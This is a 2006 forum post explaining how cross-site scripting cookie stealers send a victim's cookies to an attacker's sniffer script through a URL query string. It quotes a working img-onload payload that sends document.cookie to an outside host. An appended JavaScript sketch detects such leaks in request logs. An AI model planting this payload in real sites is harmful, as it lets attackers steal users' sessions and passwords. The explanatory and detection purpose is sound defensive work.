
  #5  
07.06.2006, 23:04
max_pain89
This <a href="http://myhost/s.jpg?it is test">click me</a> and this
<img src="http://myhost/s.jpg">

are not cookie-stealing code, because cookie stealers use JavaScript. The cookies come to the hacker in the QUERY STRING.
In http://bbs.com/news.php?news_id=6&print=on the query string is "news_id=6&print=on".
The cookie sniffer SAVES all query strings that connect to it.

IF the user's cookie is user=Mike;password=xxx
JavaScript replaces +document.cookie in
Quote:
<img src='http://ya.ru/logo.gif' onload='i=new Image();i.src="http://www.gfdfdgdfg/?"+document.cookie;'>
with the real cookies from the user's browser and connects to http://www.gfdfdgdfg.com/sniffer.php?user=Mike;password=xxx. The browser thinks that it is an image, but doesn't display it.

YOU SEE. QUERY_STRING is ?user=Mike;password=xxx and it will be saved by your SNIFFER http://www.gfdfdgdfg.com/sniffer.php

Sorry for bad, bad English.
 
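Added example, not part of the original post: a detection sketch for the pattern described above, where a site's cookie pairs show up in the query string of a request to a foreign host. The cookie names, the own-host list and the sample URL log are assumptions constructed for illustration.

```javascript
// Cookie names issued by the protected site and its own hosts (assumed values).
const SITE_COOKIE_NAMES = new Set(["user", "password"]);
const OWN_HOSTS = new Set(["bbs.com"]);

// Split a query string the way document.cookie is laid out: "a=1; b=2".
// Returns the names found on the left of each "=".
function cookiePairsInQuery(search) {
  let raw = search.replace(/^\?/, "");
  try { raw = decodeURIComponent(raw); } catch (_) { /* keep raw on bad escapes */ }
  const names = [];
  for (const part of raw.split(";")) {
    const eq = part.indexOf("=");
    if (eq <= 0) continue; // no name before "=", not a cookie pair
    names.push(part.slice(0, eq).trim());
  }
  return names;
}

// Returns the site cookie names seen in the URL's query string when the
// request goes to a host that is not ours; otherwise an empty array.
function leakedCookieNames(urlString) {
  let url;
  try { url = new URL(urlString); } catch (_) { return []; }
  if (OWN_HOSTS.has(url.hostname)) return [];
  return cookiePairsInQuery(url.search).filter((n) => SITE_COOKIE_NAMES.has(n));
}

// Scan a list of logged request URLs and keep only the suspicious ones.
function scanLog(lines) {
  return lines
    .map((u) => ({ url: u, names: leakedCookieNames(u) }))
    .filter((hit) => hit.names.length > 0);
}

// Constructed sample of outbound request URLs (for example from a proxy log).
const SAMPLE_LOG = [
  "http://bbs.com/news.php?news_id=6&print=on",
  "http://www.gfdfdgdfg.com/sniffer.php?user=Mike;password=xxx",
  "http://ya.ru/logo.gif",
  "http://www.gfdfdgdfg.com/?user=Mike;%20password=xxx",
];

console.log(scanLog(SAMPLE_LOG));
```

Cookies set with the HttpOnly attribute are not exposed through document.cookie, so they never reach a query string this way.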